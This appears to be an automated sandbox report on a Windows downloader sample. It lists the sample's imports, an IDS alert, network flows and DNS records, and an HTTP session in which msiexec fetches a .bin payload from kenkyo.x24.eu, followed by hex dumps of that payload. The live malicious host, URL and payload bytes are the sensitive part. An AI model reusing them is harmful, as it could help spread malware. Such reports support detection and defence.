                            RT_MANIFEST | 0x67b58 | 0x340 | XML 1.0 document, ASCII text, with very long lines (832), with no line terminators | English | United States | 0.5540865384615384
                            DLL | Import
                            KERNEL32.dll | SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                            USER32.dll | GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
                            GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                            SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                            ADVAPI32.dll | RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                            COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                            ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                            Description: Data
                            Comments: senestes curmurging flertalsendelsen
                            LegalTrademarks: interregna subnaturally superrighteously
                            ProductName: dagbrkningers
                            Translation: 0x0409 0x04e4
                            Language of compilation system | Country where language is spoken | Map
                            English | United States | 
                            Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                            2025-03-14T11:59:25.416764+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49723 | 5.255.110.9 | 443 | TCP
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Mar 14, 2025 11:59:21.239389896 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:21.239443064 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:21.239511967 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:21.248712063 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:21.248732090 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.116118908 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.116328955 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.163975954 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.164010048 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.164304018 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.164381027 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.168124914 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.212333918 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.416799068 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.416825056 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.416845083 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.416924953 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.416945934 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.416958094 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.417011023 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.433769941 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.433934927 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.434048891 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.434118986 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.520632029 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.520654917 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.520785093 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.520807981 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.520908117 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.523353100 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.523370028 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.523426056 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.523431063 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.523472071 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.524964094 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.524980068 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.525052071 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.525065899 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.525105953 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.526710033 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.526727915 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.526799917 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.526804924 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.526825905 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.526844978 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.611114025 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.611134052 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.611299992 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.611329079 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.611432076 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.614098072 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.614115000 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.614248037 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.614254951 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.614352942 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.614692926 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.614706993 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.614761114 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.614764929 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.614804029 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.615271091 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.615286112 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.615341902 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.615346909 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.615390062 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.616630077 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.616645098 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.616708994 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.616713047 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.616754055 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.617482901 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.617500067 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.617558002 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.617562056 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.617599964 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.688930035 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.688956976 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.689122915 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.689157009 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.689209938 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.702198982 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.702214956 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.702301979 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.702330112 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.702372074 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.705111027 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.705128908 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.705193043 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.705209017 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.705248117 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.705811977 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.705828905 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.705882072 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.705889940 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.705924988 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.706422091 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.706437111 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.706487894 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.706496000 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.706530094 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.707428932 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.707448006 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.707496881 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.707504034 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.707541943 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.708812952 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.708827972 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.708864927 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.708878994 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.708889961 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.708911896 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.708944082 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.780109882 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.780129910 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.780215025 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.780241013 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.780280113 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.794620037 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.794639111 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.795207977 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.795233965 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.795286894 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.795531034 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.795557022 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.795593023 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.795599937 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.795630932 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.795639992 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.795834064 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.795888901 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.795893908 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.795914888 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Mar 14, 2025 11:59:25.795929909 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.795965910 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.796061993 CET | 49723 | 443 | 192.168.2.4 | 5.255.110.9
                            Mar 14, 2025 11:59:25.796075106 CET | 443 | 49723 | 5.255.110.9 | 192.168.2.4
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Mar 14, 2025 11:59:21.128202915 CET | 63751 | 53 | 192.168.2.4 | 1.1.1.1
                            Mar 14, 2025 11:59:21.232640028 CET | 53 | 63751 | 1.1.1.1 | 192.168.2.4
                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                            Mar 14, 2025 11:59:21.128202915 CET | 192.168.2.4 | 1.1.1.1 | 0xa8f1 | Standard query (0) | kenkyo.x24.eu | A (IP address) | IN (0x0001) | false
                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                            Mar 14, 2025 11:59:21.232640028 CET | 1.1.1.1 | 192.168.2.4 | 0xa8f1 | No error (0) | kenkyo.x24.eu |  | 5.255.110.9 | A (IP address) | IN (0x0001) | false
                            • kenkyo.x24.eu
                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            0 | 192.168.2.4 | 49723 | 5.255.110.9 | 443 | 7356 | C:\Windows\SysWOW64\msiexec.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2025-03-14 10:59:25 UTC | 192 | OUT | GET /wp-includes/QgxEZRXDZppAsQj120.bin HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                            Host: kenkyo.x24.eu
                            Cache-Control: no-cache
                            2025-03-14 10:59:25 UTC | 251 | IN | HTTP/1.1 200 OK
                            Server: nginx
                            Date: Fri, 14 Mar 2025 10:59:25 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 385088
                            Connection: close
                            Last-Modified: Fri, 14 Mar 2025 09:27:29 GMT
                            ETag: "5e040-6304a0c28405c"
                            Accept-Ranges: bytes
                            2025-03-14 10:59:25 UTC | 16133 | IN | Data Raw: ca 3b c0 21 fc 66 de 56 9c 29 21 46 ea 46 f4 43 6a 95 ef b6 28 e4 ab 1d de ed 79 fe fd 36 e7 a2 26 11 0f 23 b8 ca ec 29 0d a6 8d 36 f0 cf 98 96 85 b3 82 bd 6a 45 68 99 4a 12 bc 8c ba c2 e9 54 c7 73 02 47 d7 95 d5 a3 4e 5b 1f 36 4a 9d 32 6b da 70 ae 2e 56 bb c9 31 82 b8 f8 74 66 7c 90 2d 31 0f 88 a4 a9 57 63 e2 48 0d da 89 ea 7f 34 f4 42 31 aa 85 a6 a9 0f 4f c2 3f 82 cb 55 94 ef 52 e4 7d 6c ff 2c b7 ba 9a a8 01 7e d8 e1 86 59 e0 e5 3c 7b eb 8a af 32 b7 d8 b2 7c 1e b4 4e 90 cd 0a f3 c5 59 84 76 81 f8 f3 1b 8d 26 a3 32 12 ed 54 80 74 df 0a ee ba d1 a9 a9 90 ad 83 68 30 41 28 0e 38 8e 63 60 6f f3 b5 74 f3 b6 ae af ba 2a a5 47 df 00 30 dd eb 64 c3 b3 a7 f4 fa fd a0 d5 25 b6 1c f5 f4 b4 52 60 1f 31 b6 94 58 b6 4c 9e cf 47 3c c0 da 56 4c f3 ed df 63 14 0b f7 93
                            Data Ascii: ;!fV)!FFCj(y6&#)6jEhJTsGN[6J2kp.V1tf|-1WcH4B1O?UR}l,~Y<{2|NYv&2Tth0A(8c`ot*G0d%R`1XLG<VLc
                            2025-03-14 10:59:25 UTC | 16384 | IN | Data Raw: 42 bd b8 16 fe 66 ee fa a0 48 29 ed 33 14 5d 41 f8 53 6a ee d2 c2 35 f3 0d b8 a0 da 98 fa ac d3 a7 b9 0d 93 dd 18 29 48 7a 3d 96 38 f0 ed 35 b8 d2 70 79 51 4d 44 3f 37 66 2d 81 7d 84 80 58 b6 8a 7c 07 d4 bb 7f ef 26 b3 a9 e4 f9 8c 2a f8 f4 af da 04 ba 44 44 c8 d2 2e 97 b7 4b 91 92 ef e9 99 57 a8 3b c6 30 1e 15 59 2a 6d 5d ed c7 07 65 8a b1 a2 ac 5b 5f 78 7c 0f 09 fe b4 0d 69 eb 46 94 84 8b 4d b8 8e 09 2a 42 b4 3a fc fd 2a cb 7d e7 4f 3e 02 09 34 a7 05 77 ef 0a 55 90 c5 fd ca a2 31 ee c9 a5 af d2 f4 fb ec ee f4 fd 8c 60 4d be f9 34 a7 b0 55 29 09 c9 13 7e 64 c3 c7 67 e9 bd ed fc 6a 36 c5 85 32 c2 f9 52 42 2f 20 38 2e b5 23 6d 65 cc bc cc 14 ef 21 41 ce 93 66 9d 9d 04 93 a4 e7 1b ee 51 f8 03 09 26 3a f8 52 10 0f e7 64 06 01 ac ae 1e 6b 05 59 6c fb ce 12 27
                            Data Ascii: BfH)3]ASj5)Hz=85pyQMD?7f-}X|&*DD.KW;0Y*m]e[_x|iFM*B:*}O>4wU1`M4U)~dgj62RB/ 8.#me!AfQ&:RdkYl'
                            2025-03-14 10:59:25 UTC | 16384 | IN | Data Raw: 0c a8 af b2 70 cc 0e f8 b1 74 6a 8b 99 e7 e6 29 71 62 60 c2 82 c7 44 92 d5 ef cd db e2 81 15 8e 07 65 f4 42 96 f2 a8 41 42 c6 41 d2 9d 1e 6c ab 9e 27 91 52 b2 05 01 84 00 11 c6 39 9b 35 1d 6a 9f 5f ed 31 89 f0 92 08 1d 76 1f fe 31 0b 07 bc 2c 5b 16 7a f3 7b 3f 6f fb 25 7c 42 e8 65 e3 3b 68 0e 7c 70 d2 a1 09 06 53 51 03 d2 b1 ae 13 6f 23 17 9d d1 ac 0a 86 0b dc a9 6a 97 4b 5b d2 8b b8 e6 ac ec 75 c7 8d 06 e0 2c 71 7f b3 b9 29 58 cc f2 64 56 d3 aa e1 0b 32 21 f3 9a da 4a 35 6e 3c 98 eb e6 a1 3f c1 b4 2a 90 51 5c 8b 0c 79 cd 47 c1 17 b8 d8 b8 9a 70 c0 ff 36 91 fe 36 c7 d3 f0 cf 38 66 1d 20 2f 22 89 9c da bd de 01 af 08 a8 5c 60 75 c8 a4 f7 f2 50 33 b6 2d c7 35 35 fc 01 fc 9d be 6f 3c b6 b2 f5 ce e7 61 19 00 07 aa 34 e0 f7 10 71 98 82 f8 20 e4 db 22 66 0d 5e
                            Data Ascii: ptj)qb`DeBABAl'R95j_1v1,[z{?o%|Be;h|pSQo#jK[u,q)XdV2!J5n<?*Q\yGp668f /"\`uP3-55o<a4q "f^
                            2025-03-14 10:59:25 UTC | 16384 | IN | Data Raw: 69 e9 eb b0 16 14 43 af 21 f9 a3 66 55 e7 b2 13 ec 5f f0 61 7b 88 6e 18 5a 0b 1e 35 a2 24 58 0a 71 9f 74 1a 0d f9 cc f5 80 36 04 b9 84 df f6 5f a1 d3 cb 87 17 22 a3 06 b0 4f bb 51 0c 64 ee 64 95 6d a2 bb f3 fc 80 d9 2e 76 22 91 81 28 04 78 0e 34 f9 2b c7 79 c3 21 3f 49 45 8b 6e ac 7c f1 bd 92 4f 0a f9 34 dd 2b 0c 40 ba 2c ca 41 e3 f1 1c dd 96 b9 17 82 d7 9f e3 9f 7a 6f 13 d6 d0 22 ed 60 a1 49 0c f7 7f 2c 43 73 ae 47 4a 54 84 c1 3f 34 f3 1e 41 88 b2 f4 9a 8b 42 cb 43 36 82 76 a9 2d 89 fc 99 94 a2 00 88 45 51 88 52 19 18 09 85 53 ad 33 af 8a df bd 1c 10 d9 ef e6 de 55 28 dd 97 64 5d b3 b4 ab 29 0f 7d 52 91 3a 73 12 2d 09 97 6e e8 c4 83 41 61 e0 ab cd 44 e4 5d 37 d8 7a 03 34 4e 8d 09 1f d1 49 a8 ab 60 2a ad e6 b3 61 67 0b 7f f3 63 07 fc a3 9d 30 0a 03 67 0c
                            Data Ascii: iC!fU_a{nZ5$Xqt6_"OQddm.v"(x4+y!?IEn|O4+@,Azo"`I,CsGJT?4ABC6v-EQRS3U(d])}R:s-nAaD]7z4NI`*agc0g
                            2025-03-14 10:59:25 UTC | 16384 | IN | Data Raw: cb d4 f6 31 01 fa 3f 43 be 46 b0 9a dc 4b 68 9f 86 f2 66 be 61 50 db 1c e5 c5 55 e0 cb f8 3d 87 23 c9 3e 1a 86 0e c6 09 54 b9 96 97 69 1d bb a3 dc a6 ef ef 2a 2c cf c4 4f d5 c0 8d 7d be 54 b5 f9 e2 0d 95 90 32 6e f9 56 f6 e6 3f 7e fa a5 f0 a9 9a 34 34 f3 35 98 e9 f7 49 c3 a8 39 58 d8 96 5a 74 96 52 a2 55 79 67 12 d2 fb a0 47 21 69 5c 33 c3 9c 7b 3c 93 7d 75 0e 6c be b1 0d ab bb 5b 58 86 7e 4f 68 7b 44 d2 a5 c1 88 f6 b1 95 fb 2d 1a 7c 97 ca 22 57 1c 7a 85 a6 c1 2a 0d 6a e7 35 6d 32 62 82 16 e1 86 f6 f3 67 02 1d 05 3d 4e 17 9e f7 31 b4 d1 45 f3 f6 fb 35 08 ca ae 0d 01 68 3e 00 03 71 56 9e af 64 f1 0a 3c e1 9a a5 93 a5 02 6f af 3a af b0 48 6a 97 79 c8 f8 9a 80 ee c4 b2 82 94 77 62 88 f9 c9 68 de 3f ee ca c4 cb 12 3e da fa 61 15 00 b7 93 9a ca e1 de f3 ed e2
                            Data Ascii: 1?CFKhfaPU=#>Ti*,O}T2nV?~445I9XZtRUygG!i\3{<}ul[X~Oh{D-|"Wz*j5m2bg=N1E5h>qVd<o:Hjywbh?>a
                            2025-03-14 10:59:25 UTC | 16384 | IN | Data Raw: e4 78 cb 4a 39 d2 a4 64 9d 92 43 5d 44 d7 25 80 f0 f7 56 ad 35 8d 67 bc af a0 ce 24 9c 3c eb 8f 4a 27 d0 9d a4 17 79 6b b4 c4 34 5d 69 67 46 e4 16 07 72 58 8c cc 3e 75 7d 45 22 79 c0 4b 09 b7 9f 3f 8a 81 ab 21 94 c2 ab bb 7c 81 7a 4e 04 62 6c 78 6e 22 a2 ad b6 79 38 bb 06 d9 da 7f c5 58 7a 07 e0 3c 5f ea e9 a5 c1 79 75 f0 af cd fa be 37 5b 6f ca ca 66 ae 18 ba e8 0b ee 76 1d e6 34 0f d2 4c fa 5d f5 5a 40 70 c5 a5 53 a6 6d fa 38 d9 14 75 e4 0d 42 ff 91 09 f3 87 1f 3f bd 2a 84 95 38 fb b4 0e 93 58 b2 e9 c5 35 13 cc d2 ce 4a f3 20 86 b9 6a 2f 9b 7b 5d 6e 0c 78 d5 a4 3d b2 82 eb 7f 07 c3 06 60 0b f5 43 2a 69 6c 64 fe ec 8e 0c 78 f7 58 3c 28 95 8d 3a 92 b9 d2 94 71 3b de 14 9e 41 a5 6d 86 7e 32 c2 30 06 db 99 91 15 21 b4 c5 fc b1 7c 49 10 76 f3 cc 65 68 7d 4a
                            Data Ascii: xJ9dC]D%V5g$<J'yk4]igFrX>u}E"yK?!|zNblxn"y8Xz<_yu7[ofv4L]Z@pSm8uB?*8X5J j/{]nx=`C*ildxX<(:q;Am~20!|Iveh}J
